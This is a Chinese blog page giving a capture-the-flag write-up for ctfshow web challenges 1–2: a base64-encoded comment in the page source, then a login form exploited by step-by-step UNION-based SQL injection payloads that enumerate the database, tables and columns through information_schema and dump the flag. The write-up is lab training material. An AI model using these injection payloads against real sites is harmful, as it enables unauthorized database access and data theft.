当前位置:网站首页>ctfshow web 1-2
ctfshow web 1-2
2022-06-12 08:08:00 【hint=flag】
ctfshow web 1-3
第一题是签到题
打开链接后
看看源码:
发现一段注释
base64解码:
web2
打开链接:
是一个登录界面,猜测可以sql注入:
尝试注入点
有回显,说明可以sql注入
爆破注入点数量:
admin’ union select 1,2,3#
说明有三个注入点
爆破数据库名:
admin’ union select 1,database(),3#
数据库名是web
联合查询查表名:
admin’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
有两个表flag和user
猜测flag就在flag这个表里面
就爆破flag这个表:
联合查询:admin’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag’#
只有flag一列数据
查询这一列数据:
admin’ union select 1,flag,3 from flag#
直接回显flag
ctfshow{ef340bd6-5a61-4adc-a889-469bb6e31482}
边栏推荐
- Vision Transformer | CVPR 2022 - Vision Transformer with Deformable Attention
- Improvement of hash function based on life game (continued 1)
- 牛客网的项目梳理
- 制造企业生产排产现状和APS系统的解决方案
- Servlet
- MES系统质量追溯功能,到底在追什么?
- HDLC protocol
- Compiling principle on computer -- functional drawing language (V): compiler and interpreter
- Leetcode notes: biweekly contest 70
- MYSQL中的锁的机制
猜你喜欢
Special notes on using NAT mode in VM virtual machine
System service configuration service - detailed version
Introduction to coco dataset
Final review of Discrete Mathematics (predicate logic, set, relation, function, graph, Euler graph and Hamiltonian graph)
Vision Transformer | Arxiv 2205 - TRT-ViT 面向 TensorRT 的 Vision Transformer
(P17-P18)通过using定义基础类型和函数指针别名,使用using和typedef给模板定义别名
Explanation and explanation on the situation that the volume GPU util (GPU utilization) is very low and the memory ueage (memory occupation) is very high during the training of pytoch
Vision Transformer | CVPR 2022 - Vision Transformer with Deformable Attention
Group planning chapter I
Detailed explanation of Google open source sfmlearner paper combining in-depth learning slam -unsupervised learning of depth and ego motion from video
随机推荐
2.1 linked list - remove linked list elements (leetcode 203)
HDLC protocol
目前MES应用很多,为什么APS排程系统很少,原因何在?
(P15-P16)对模板右尖括号的优化、函数模板的默认模板参数
Vision Transformer | Arxiv 2205 - TRT-ViT 面向 TensorRT 的 Vision Transformer
Summary of structured slam ideas and research process
Leetcode notes: biweekly contest 70
Vscode 调试TS
Improvement of hash function based on life game (continued 1)
js中的数组
Face recognition using BP neural network of NNET in R language
PPP agreement
Windows10 configuration database
Database connection pool and dbutils tool
StrVec类 移动拷贝
Transformation from AC5 to AC6 (1) - remedy and preparation
Talk about the four basic concepts of database system
"Three.js" auxiliary coordinate axis
后MES系统的时代,已逐渐到来
Architecture and performance analysis of convolutional neural network